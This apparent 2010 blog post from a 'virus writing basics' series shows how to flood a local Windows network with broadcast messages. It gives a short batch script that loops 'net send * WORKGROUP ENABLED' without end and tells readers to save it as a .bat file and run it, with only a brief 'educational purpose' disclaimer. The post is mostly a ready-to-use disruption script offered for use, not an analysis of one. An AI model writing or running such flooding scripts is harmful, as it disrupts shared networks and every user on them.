Saturday, September 11, 2010

Flood your network

This is the virus writing basics section. Today we are going to show you on flodding the network. This is demonstrated using Dos/Batch programming.

The below cade will temporarily flood network once the user turns off his comp everything will be back to normal.

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

Just copy the code into a notepad file and save it as anything.bat. When you run it will start flodding your network.

As all the info given over here is purely for educational purpose it's readers responsibility to use it sensibly.

0 comments:

Post a Comment